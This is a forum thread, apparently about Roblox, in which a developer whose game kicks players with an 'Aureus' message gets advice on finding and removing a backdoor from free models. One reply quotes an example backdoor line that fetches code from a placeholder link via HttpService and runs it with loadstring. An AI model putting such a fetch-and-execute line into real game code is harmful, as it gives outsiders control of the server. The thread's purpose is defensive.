Translation: Aureus is the best server side ever! (Error Code 267)
This also happens on different accounts and I checked in studio and I got no kick, I deleted my plugins that I didn’t know if they were safe and I don’t what to do now. I have also checked all scripts in studio too and nothing.
Yeah, you definitely have a backdoor in your game. Check every single one of your server-sided scripts, there also may be some hidden in the workspace. A backdoor might look something like:
loadstring(game.HttpService:GetAsync("DODGY LINK HERE"))()
Iteration to do in the console that might help you find any hidden scripts: for i, v in ipairs(game:GetDescendants()) do if v:IsA("Script") then print(v.Name, v.Parent.Name) end end
One more thing. You want to check every single line of code in the script, even if you wrote it yourself.
Also, disable LoadStringEnabled in the properties of ServerScriptService and disable HTTP requests on your game’s settings if you can - these should provide more security.
Try looking through whatever models you have and their scripts and filter for the words " Kick " or " Require ". If you find anything, you should definitely remove it. this is 100% the result of adding a free model. I’ve also seen others mention look for loadstrings, try that too.
Also, I’m kinda confused because I have a feedback button and somebody sent it at like 12:20 pm (3 hours ago) and its kind of impossible to do that because they would’ve gotten kicked and I haven’t updated the game recently.